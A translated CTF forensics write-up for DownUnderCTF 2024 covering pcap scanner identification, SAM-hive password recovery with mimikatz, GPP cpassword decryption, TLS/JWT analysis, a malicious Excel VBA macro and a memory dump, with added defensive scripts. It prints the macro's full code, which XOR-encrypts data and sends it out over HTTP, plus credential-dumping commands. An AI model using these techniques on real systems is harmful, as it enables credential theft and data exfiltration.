I regularly take part in forensics competitions, which differ quite a bit from the forensics found in CTFs, so I had been meaning to go through the forensics challenges of CTFs. I happened to notice that one international CTF has a dedicated forensics category, so I picked it up and worked through it.
They’ve been trying to breach our infrastructure all morning! They’re trying to get more info on our covert kangaroos! We need your help, we’ve captured some traffic of them attacking us, can you tell us what tool they were using and its version?
NOTE: Wrap your answer in the DUCTF{}, e.g. DUCTF{nmap_7.25}
The challenge is a packet capture. For this kind of task, analyzing an attacker's traffic, start by looking at the HTTP streams; the attacker's tool and its version show up right away.
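As an added example (not part of the original writeup), the script below does what the HTTP-stream inspection above does by hand: it pulls the User-Agent header out of each captured request and matches it against known scanner signatures, so the tool and version can be reported and counted over a whole capture rather than spotted by eye. The request lines are constructed; the Nikto User-Agent shape, `Mozilla/5.00 (Nikto/<version>) (Evasions:...) (Test:...)`, is the one the tool really sends.

```python
import re

# Constructed sample requests, standing in for what "Follow HTTP Stream" shows in
# Wireshark; they are not taken from the challenge pcap.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: outpost.example\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0\r\n\r\n",
    "GET /cgi-bin/test.cgi HTTP/1.1\r\nHost: outpost.example\r\n"
    "User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)\r\n\r\n",
    "GET /admin/ HTTP/1.1\r\nHost: outpost.example\r\n"
    "User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)\r\n\r\n",
]

# Scanner fingerprints as they appear in the User-Agent header.  A capture group,
# where present, is the version.
SCANNER_PATTERNS = {
    "Nikto": re.compile(r"Nikto/(\d+(?:\.\d+)+)"),
    "sqlmap": re.compile(r"sqlmap/(\d+(?:\.\d+)+)"),
    "Nmap": re.compile(r"Nmap Scripting Engine"),
}


def user_agent(request):
    """Return the User-Agent value of one raw HTTP request, or None."""
    for line in request.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "user-agent":
            return value.strip()
    return None


def identify_scanner(request):
    """Return (tool, version-or-None) if the request carries a known scanner UA."""
    ua = user_agent(request)
    if not ua:
        return None
    for tool, pattern in SCANNER_PATTERNS.items():
        match = pattern.search(ua)
        if match:
            version = match.group(1) if match.lastindex else None
            return tool, version
    return None


def summarize(requests):
    """Count scanner hits per tool_version label across a list of raw requests."""
    counts = {}
    for request in requests:
        hit = identify_scanner(request)
        if hit is None:
            continue
        tool, version = hit
        label = f"{tool}_{version}" if version else tool
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for label, n in summarize(SAMPLE_REQUESTS).items():
        print(f"{label}: {n} requests")
```

The User-Agent is only a hint: scanners can rewrite it, so in a real investigation the request pattern (hundreds of requests for well-known paths in a short window) is the stronger signal, and the header merely names the tool.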
flag: DUCTF{Nikto_2.1.6}
The attacker managed to gain Domain Admin on our rebels Domain Controller! Looks like they managed to log on with an account using WMI and dumped some files. Can you reproduce how they got the Administrator’s Password with the artifacts provided?
Place the Administrator Account’s Password in DUCTF{}, e.g. DUCTF{password123!}
The attachments are the SAM and system hive files, which together can be used to recover the machine's account passwords; SAMinside or mimikatz can extract them. We solve it with mimikatz here; if you are interested, give SAMinside a try too.

mimikatz: https://github.com/gentilkiwi/mimikatz
```
lsadump::sam /sam:sam.bak /system:system.bak
```
With the hash in hand, look it up on an online cracking site; hashcat works too.
flag: DUCTF{Nikto_2.1.6}
Looks like the attacker managed to access the rebels Domain Controller.
Can you figure out how they got access after pulling these artifacts from one of our Outpost machines?
The attachments were baffling at first. Combining the challenge name with the attachments, "bad policies" points to problematic policies, and the attachment names look like the unique IDs of those policies; so a policy problem must be how the domain controller was taken over. With that in mind I found the following article:

Domain penetration: recovering passwords saved in Group Policy from SYSVOL (域渗透——利用SYSVOL还原组策略中保存的密码)

From it we learn that the cpassword attribute in the Groups.xml configuration file holds the encrypted password. Using Everything (the file search tool), locate groups.xml:

```
cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2"
```

Once found, decrypt it with gpp-decrypt, the Group Policy decryption tool bundled with Kali. gpp is short for Group Policy Preferences; the method from the article linked above also works.
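Added example, not from the writeup and not gpp-decrypt's own code: a small audit script that finds cpassword attributes in Group Policy Preferences XML. gpp-decrypt works at all because Microsoft published the AES-256 key used to protect cpassword (the issue fixed for new policies by MS14-025), so any such value in SYSVOL is effectively a plaintext credential; the useful defensive check is to locate them before an attacker does. The Groups.xml below is constructed around the cpassword quoted above, the function names are my own, and the AES decryption itself is left to gpp-decrypt.

```python
import base64
import xml.etree.ElementTree as ET

# Group Policy Preferences files that can carry a cpassword attribute.
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")

# Constructed Groups.xml; only the cpassword value is the one from the writeup.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator (built-in)" changed="2024-06-01 10:00:00">
    <Properties action="U" userName="Administrator (built-in)" neverExpires="1"
      cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2"/>
  </User>
</Groups>
"""


def decode_cpassword_b64(value):
    """cpassword is base64 with the '=' padding stripped; restore it before decoding."""
    return base64.b64decode(value + "=" * (-len(value) % 4))


def find_cpasswords(xml_text, source):
    """Return one finding per element that carries a non-empty cpassword attribute."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cp = elem.get("cpassword")
        if not cp:          # absent, or "" after the password was removed
            continue
        ciphertext = decode_cpassword_b64(cp)
        findings.append({
            "file": source,
            "element": elem.tag,
            # different preference types name the account differently
            "user": elem.get("userName") or elem.get("accountName")
                    or elem.get("runAs") or "",
            "ciphertext_len": len(ciphertext),
            # AES-CBC output is a whole number of 16-byte blocks
            "aes_block_aligned": len(ciphertext) % 16 == 0,
        })
    return findings


def audit_sysvol(files):
    """files: {relative path: content}. Only GPP preference files are parsed."""
    findings = []
    for path, content in files.items():
        if path.rsplit("/", 1)[-1] in GPP_FILES:
            findings.extend(find_cpasswords(content, path))
    return findings


if __name__ == "__main__":
    # Constructed SYSVOL layout; a real run would walk \\<domain>\SYSVOL\<domain>\Policies.
    sysvol = {
        "Policies/{constructed-guid}/Machine/Preferences/Groups/Groups.xml": SAMPLE_GROUPS_XML,
        "Policies/{constructed-guid}/GPT.INI": "[General]\nVersion=1\n",
    }
    for f in audit_sysvol(sysvol):
        print(f"{f['file']}: <{f['element']}> user={f['user']!r} "
              f"ciphertext={f['ciphertext_len']} bytes")
```

Any finding is a credential exposure regardless of what it decrypts to; the remediation is to remove the preference item and rotate the account, not merely to delete the attribute.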
flag: DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
As all good nation states, we have our own malware and C2 for offensive operations. But someone has got the source code and is using it against us! Here’s a capture of traffic we found on one of our laptops…
Attachments: sslkeylogfile.txt and challenge.pcap

Being handed this ssl key file means we need to decrypt TLS in Wireshark; the last time I saw this was in a challenge from the first Pangu Stone finals. In Edit -> Preferences, find TLS under Protocols and pick the txt file in the (Pre)-Master-Secret log file field.

With decryption done, analyze the capture: the traffic is not HTTP/1.1 but HTTP/2. The best way to analyze traffic is still to go stream by stream. Following the HTTP/2 streams, stream 8 reveals the website login password, stream 23 holds a GET request followed by a long list that is probably file names, and stream 34 contains a JWT token.

After that you presumably log in to the site and need to forge administrator privileges, using the JWT token, to obtain the flag; the administrator's JWT token should be somewhere in the pile of files from stream 23. Because this needs the live environment, the challenge cannot be reproduced further here; see the writeups other players wrote during the competition.
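Added example, not from the writeup: how to read a JWT pulled out of a decrypted HTTP/2 stream, and why holding one does not let you simply edit its claims into an administrator token. Decoding needs no key, which is why a captured token is immediately informative; verification does, which is why an edited payload with the old signature fails. The token, server secret and claim names are constructed, and HS256 (HMAC-SHA256) is assumed as the signing algorithm.

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(s):
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def hs256_token(header, claims, secret):
    """Mint an HS256 token; used here only to construct the sample 'captured' token."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def inspect_token(token):
    """Decode header and claims WITHOUT verifying: what an analyst sees in the capture."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def verify_hs256(token, secret):
    """True only if the signature is a valid HMAC-SHA256 over header.payload with `secret`."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        signature = b64url_decode(s)
    except ValueError:              # wrong segment count, bad base64, bad JSON
        return False
    if header.get("alg") != "HS256":   # refuse 'none' and any algorithm switch
        return False
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)


def with_claims(token, **changes):
    """Re-encode the payload with changed claims but keep the old signature."""
    h, p, s = token.split(".")
    claims = json.loads(b64url_decode(p))
    claims.update(changes)
    return f"{h}.{b64url_encode(json.dumps(claims, separators=(',', ':')).encode())}.{s}"


# Constructed values: the server's signing secret and a token as it might appear in stream 34.
SERVER_SECRET = b"constructed-server-secret"
CAPTURED = hs256_token({"alg": "HS256", "typ": "JWT"},
                       {"sub": "emu", "role": "user"}, SERVER_SECRET)
# An unsigned token claiming admin; the verifier must reject it on alg alone.
NONE_TOKEN = (b64url_encode(b'{"alg":"none","typ":"JWT"}') + "."
              + b64url_encode(b'{"sub":"emu","role":"admin"}') + ".")

if __name__ == "__main__":
    header, claims = inspect_token(CAPTURED)
    print("header:", header, "claims:", claims)
    print("captured verifies:", verify_hs256(CAPTURED, SERVER_SECRET))
    edited = with_claims(CAPTURED, role="admin")
    print("edited claims:", inspect_token(edited)[1],
          "verifies:", verify_hs256(edited, SERVER_SECRET))
    print("alg=none verifies:", verify_hs256(NONE_TOKEN, SERVER_SECRET))
```

On the server side the lesson is the mirror image: decode only after verifying, pin the expected algorithm, and check expiry and audience claims, so that a token lifted from a capture is worth only as much as the account it was issued to.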
We managed to pull this excel spreadsheet artifact from one of our Outpost machines. Its got something sus happening under the hood. After opening we found and captured some suspicious traffic on our network. Can you find out what this traffic is and find the flag!
Note: you do not need to run or enable the macros, so solve it accordingly.
Opening the Excel file shows a bunch of monkeys and a prompt that macros have been disabled; the challenge also says I don't need to run or enable them.

First, a quick look at what a macro is in Excel: a macro is a set of instructions written in the VBA programming language that automatically carries out a series of operations in Excel.

The point of this challenge is to analyze the macro, which we can do with oletools: https://github.com/decalage2/oletools

```
pip install -U oletools
```

It extracts a lot of data, including base64-encoded content that turns out to be decoy data. Fair enough: besides the Excel file the attachments include a pcap, which we will get to later.

Save the extracted code:
```vb
' Macro as extracted with olevba; the comments are added for this writeup.

' XOR every character of B with the repeating key C (identical to doThing below).
Public Function anotherThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    anotherThing = A
End Function

' Decoy: fills column B with random numbers and bubble-sorts rows A/B; never touches the flag.
Public Function importantThing()
    Dim tempString As String
    Dim tempInteger As Integer
    Dim I As Integer
    Dim J As Integer
    For I = 1 To 5
        Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)
    Next I
    For I = 1 To 5
        For J = I + 1 To 5
            If Cells(J, 2).Value < Cells(I, 2).Value Then
                tempString = Cells(I, 1).Value
                Cells(I, 1).Value = Cells(J, 1).Value
                Cells(J, 1).Value = tempString
                tempInteger = Cells(I, 2).Value
                Cells(I, 2).Value = Cells(J, 2).Value
                Cells(J, 2).Value = tempInteger
            End If
        Next J
    Next I
End Function

' Replaces spaces with "-" so a byte list can be used as a URL path segment.
Public Function totalyFine(A As String) As String
    Dim B As String
    B = Replace(A, " ", "-")
    totalyFine = B
End Function

Sub macro1()
    ' Lots of single-letter strings; only S, G, D, F (key parts), Q (plaintext) and J (URLs) matter.
    Dim Path As String
    Dim wb As Workbook
    Dim A As String
    Dim B As String
    Dim C As String
    Dim D As String
    Dim E As String
    Dim F As String
    Dim G As String
    Dim H As String
    Dim J As String
    Dim K As String
    Dim L As String
    Dim M As String
    Dim N As String
    Dim O As String
    Dim P As String
    Dim Q As String
    Dim R As String
    Dim S As String
    Dim T As String
    Dim U As String
    Dim V As String
    Dim W As String
    Dim X As String
    Dim Y As String
    Dim Z As String
    Dim I As Long
    N = importantThing()
    K = "Yes"
    S = "Mon"                                   ' key part 1
    U = forensics(K)
    V = totalyFine(U)
    D = "Ma"                                    ' key part 3
    J = "https://play.duc.tf/" + V              ' decoy beacon: "Yes" as decimal bytes
    superThing J
    J = "http://flag.com/"
    superThing J
    G = "key"                                   ' key part 2
    J = "http://play.duc.tf/"
    superThing J
    J = "http://en.wikipedia.org/wiki/Emu_War"
    superThing J
    N = importantThing()
    Path = ThisWorkbook.Path & "flag.xlsx"      ' no path separator in the extracted code
    Set wb = Workbooks.Open(Path)
    Dim valueA1 As Variant
    valueA1 = wb.Sheets(1).Range("A1").Value    ' the flag is read from flag.xlsx
    MsgBox valueA1
    wb.Close SaveChanges:=False
    F = "gic"                                   ' key part 4
    N = importantThing()
    Q = "Flag: " & valueA1                      ' plaintext
    H = "Try Harder"
    U = forensics(H)
    V = totalyFine(U)
    J = "http://downunderctf.com/" + V          ' decoy beacon: "Try Harder"
    superThing J
    W = S + G + D + F                           ' key = "MonkeyMagic"
    O = doThing(Q, W)                           ' ciphertext = plaintext XOR key
    M = anotherThing(O, W)                      ' XORs back to plaintext; unused
    A = something(O)                            ' binary text; unused
    Z = forensics(O)                            ' ciphertext as space-separated decimal bytes
    N = importantThing()
    P = "Pterodactyl"
    U = forensics(P)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V               ' decoy beacon: "Pterodactyl"
    superThing J
    T = totalyFine(Z)                           ' spaces -> dashes
    MsgBox T
    J = "http://downunderctf.com/" + T          ' the encrypted flag leaves in the URL path
    superThing J
    N = importantThing()
    E = "Forensics"
    U = forensics(E)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V               ' decoy beacon: "Forensics"
    superThing J
End Sub

' Same XOR as anotherThing; this is the one used to produce the ciphertext.
Public Function doThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    doThing = A
End Function

' Synchronous HTTP GET via MSXML2: every call is a request visible in the pcap.
Public Function superThing(ByVal A As String) As String
    With CreateObject("MSXML2.ServerXMLHTTP.6.0")
        .Open "GET", A, False
        .Send
        superThing = StrConv(.responseBody, vbUnicode)
    End With
End Function

' Converts each byte to binary text. inputText is never declared in the extracted
' macro, and the result is unused, so this path does not matter for the solve.
Public Function something(B As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(inputText)
        A = A & WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))
    Next I
    something = A
End Function

' Converts a string to a space-separated list of its decimal byte values.
Public Function forensics(B As String) As String
    Dim A() As Byte
    Dim I As Integer
    Dim C As String
    A = StrConv(B, vbFromUnicode)
    For I = LBound(A) To UBound(A)
        C = C & CStr(A(I)) & " "
    Next I
    C = Trim(C)
    forensics = C
End Function
```
```vb
W = S + G + D + F
O = doThing(Q, W)
M = anotherThing(O, W)
```

The code above contains these lines. The anotherThing function defines an XOR operation, and W is assembled by concatenating several variable values, so W is the key:

```vb
S = "Mon"
G = "key"
D = "Ma"
F = "gic"
W = "MonkeyMagic"
```

The plaintext is XORed into ciphertext by anotherThing; with the key known, we only need to find the ciphertext and XOR it back. Since a pcap was provided, the ciphertext should be hidden in there.

Looking at the HTTP objects, there are URLs made up of strings of ASCII codes, presumably the ciphertext. From experience, the third and longest one is the ciphertext; if unsure, try the other three, which convert from decimal to Try Harder, Pterodactyl and Forensics. Just decrypt it:
```python
def decode(encoded, key):
    # XOR each ciphertext byte with the repeating key (the inverse of the macro's doThing)
    a = ''.join(chr(encoded[i] ^ ord(key[i % len(key)])) for i in range(len(encoded)))
    return a

# decimal byte values taken from the URL path in the capture
m = [11, 3, 15, 12, 95, 89, 9, 52, 36, 61, 37, 54, 34, 90, 15, 86, 38, 26, 80, 19, 1, 60, 12, 38, 49, 9, 28, 38, 0, 81, 9, 2, 80, 52, 28, 19]
key = "MonkeyMagic"
flag = decode(m, key)
print(flag)
```
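Added example that extends the decode script above (it is not the writeup's own code): it reproduces the macro's encoding chain, doThing XOR, then forensics decimal bytes, then totalyFine replacing spaces with dashes, so the expected beacon path can be generated from a plaintext, and it runs the reverse over a list of request lines, separating the decoy words from the XORed flag automatically instead of by eye. The request lines are constructed to match the macro's URL pattern; the ciphertext path is the one from the capture.

```python
KEY = "MonkeyMagic"   # S + G + D + F from the macro

# Constructed request lines following the macro's URL pattern; the third path is the
# ciphertext captured in the pcap, the others are the decoy words and the Wikipedia hit.
SAMPLE_REQUEST_LINES = [
    "GET /84-114-121-32-72-97-114-100-101-114 HTTP/1.1",
    "GET /80-116-101-114-111-100-97-99-116-121-108 HTTP/1.1",
    "GET /11-3-15-12-95-89-9-52-36-61-37-54-34-90-15-86-38-26-80-19-1-60-12-38-49-9-28-38-0-81-9-2-80-52-28-19 HTTP/1.1",
    "GET /70-111-114-101-110-115-105-99-115 HTTP/1.1",
    "GET /wiki/Emu_War HTTP/1.1",
]


def xor_bytes(data, key):
    """doThing/anotherThing: XOR with a repeating key; the operation is its own inverse."""
    return bytes(b ^ ord(key[i % len(key)]) for i, b in enumerate(data))


def macro_encode(text, key):
    """Reproduce macro1's flag path: XOR (doThing) -> decimal bytes (forensics) -> dashes (totalyFine)."""
    return "-".join(str(b) for b in xor_bytes(text.encode("latin-1"), key))


def path_to_bytes(path):
    """Parse a '/11-3-15-...' path back into bytes; None if it is not a numeric beacon path."""
    parts = path.strip("/").split("-")
    if not all(p.isdigit() for p in parts):
        return None
    values = [int(p) for p in parts]
    return bytes(values) if all(v < 256 for v in values) else None


def is_printable_ascii(data):
    return all(32 <= b < 127 for b in data)


def triage(request_lines, key):
    """For each numeric beacon path, give the plain decode, or the XOR decrypt when the
    plain decode is not readable text (which is how the ciphertext stands out)."""
    results = []
    for line in request_lines:
        try:
            _method, path, _version = line.split(" ", 2)
        except ValueError:
            continue
        data = path_to_bytes(path)
        if data is None:
            continue
        if is_printable_ascii(data):
            results.append({"path": path, "kind": "plain", "text": data.decode("ascii")})
        else:
            results.append({"path": path, "kind": "xor",
                            "text": xor_bytes(data, key).decode("latin-1")})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_REQUEST_LINES, KEY):
        print(f"{r['kind']:5} {r['text']}")
    print("expected path:", macro_encode("Flag: DUCTF{M4d3_W1th_AI_by_M0nk3ys}", KEY))
```

Feeding `macro_encode` the recovered plaintext and checking that it reproduces the captured path is a cheap way to confirm the key and the XOR direction are right, rather than trusting a single decode that happens to look plausible.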
flag: DUCTF{M4d3_W1th_AI_by_M0nk3ys}
Looks like one of our Emu soldiers ran something on an Outpost machine and now it’s doing strange things.
We took a memory dump as a precaution. Can you tell us whats going on?
This challenge has four parts to combine into the final flag with _ between each answer.
Find all four answers and combine them into the flag as all lower case like DUCTF{answer1_answer2_answer3_answer4}
eg. DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}
1. What was the name of the malicious executable? eg malicious.xlsm
2. What was the name of the powershell module used? eg invoke-mimikatz
3. What were the names of the two files executed from the malicious executable (In alphabetical order with – in between and no spaces)? eg malware.exe-malware2.exe
4. What was the password of the new account created through powershell? eg strong-password123
A memory analysis challenge. Memory analysis is the classic kind of forensics, and I like to use vol2. Start with a preliminary look.

Skimming the four questions: for the first, finding the executable should just be a matter of looking at the command line, using the consoles command.

Also in the consoles output we find the content shown below. A Baidu search shows that this uses PowerShell to get a reverse shell, so it is attack-related; note it down for now.

The remaining three questions all look PowerShell-related, so dump the PowerShell-related processes.

pslist shows three powershell processes in total. To be safe, we export the parent powershell process, PID 1136:

```
python2 vol.py -f 1.raw --profile=Win7SP1x86_23418 memdump -p 1136 --dump-dir .
strings 1136.dmp | grep "iex (New-Object net.we"
```
grep-matching the content noted earlier shows it is a reflective DLL injection attack, so the answer to question 2 is Invoke-ReflectivePEInjection, and question 3 is emu.dll-kiwi.dll.

Only question 4 is left, and it also has to come out of 1136.dmp. Match directly to see what commands were entered in powershell:

```
strings 1136.dmp | grep "powershell"
```
This turns up data that looks like the answer. Asking an AI what the snippet means: analyze the variable assignment: first, look at the assignment to the $PKjAU variable and note the concatenation pattern in the string, for example 'dd'+'a/' is really 'dda/'. Decode the string: use PowerShell to decode it; since the string is concatenated back to front, you may need to write a PowerShell script to decode it in reverse.

So convert it in CyberChef, and it works out.
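Added example, not from the writeup and not the actual command recovered from 1136.dmp: a de-obfuscator for the construction the AI explanation describes, a PowerShell string assembled from `'..'+'..'` pieces in reverse order and flipped at runtime with `-join ($v[-1..-($v.Length)])`. The sample script, account name and password are constructed; the helper then flags a `net user ... /add` command and pulls out the account and password fields, which is what question 4 asks for.

```python
import re

# Constructed sample in the style of the string found in the dump.  The account name
# and password are made up; the real values come from 1136.dmp.
SAMPLE_SCRIPT = (
    "$PKjAU = ('dd'+'a/ d'+'etcurt'+'snoc-dr'+'0wssaP r'+'esu-elp'+'maxe re'+'su ten'); "
    "$cmd = -join ($PKjAU[-1..-($PKjAU.Length)]); "
    "iex $cmd"
)

# A single-quoted PowerShell literal; '' inside it stands for one quote.
LITERAL = re.compile(r"'((?:[^']|'')*)'")
# $var = ('a'+'b'+...)  with or without the surrounding parentheses.
ASSIGN = re.compile(r"\$(\w+)\s*=\s*\(?((?:\s*'(?:[^']|'')*'\s*\+?)+)\)?")
# -join ($var[-1..-($var.Length)])  : the string-reversal idiom.
REVERSE_JOIN = re.compile(
    r"-join\s*\(\s*\$(\w+)\s*\[\s*-1\s*\.\.\s*-\s*\(\s*\$\1\.Length\s*\)\s*\]\s*\)")
# net user <name> <password> /add
NET_USER_ADD = re.compile(r"\bnet(?:\.exe)?\s+user\s+(\S+)\s+(\S+)\s+/add\b", re.IGNORECASE)


def concatenated_assignments(script):
    """Map variable name -> joined string for every $var = 'a'+'b'+... assignment."""
    values = {}
    for m in ASSIGN.finditer(script):
        pieces = [p.replace("''", "'") for p in LITERAL.findall(m.group(2))]
        values[m.group(1)] = "".join(pieces)
    return values


def reversed_variables(script):
    """Names of variables whose contents the script reverses with the -join idiom."""
    return set(REVERSE_JOIN.findall(script))


def deobfuscate(script):
    """Join the literal pieces, then undo the runtime reversal where the script applies it."""
    values = concatenated_assignments(script)
    for var in reversed_variables(script):
        if var in values:
            values[var] = values[var][::-1]
    return values


def classify(command):
    """Flag local account creation; returns (label, user, password) or None."""
    m = NET_USER_ADD.search(command)
    if m:
        return ("local-account-creation", m.group(1), m.group(2))
    return None


if __name__ == "__main__":
    for var, value in deobfuscate(SAMPLE_SCRIPT).items():
        print(f"${var} = {value!r}")
        print("  ->", classify(value))
```

The two regexes cover only the concatenation and reversal tricks seen here; format-operator (`-f`) and `[char]` arithmetic obfuscation need their own handlers, which is why CyberChef's recipe approach, or simply running the string-building part in a sandboxed PowerShell, is often faster for one-off analysis.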
flag:DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}
For more resources, follow the ZeroPointZero security team; reply "取证" (forensics) to the official account to get the challenge attachments.
Originally published on the WeChat official account ZeroPointZero Security Team: DownUnderCTF 2024, forensics writeups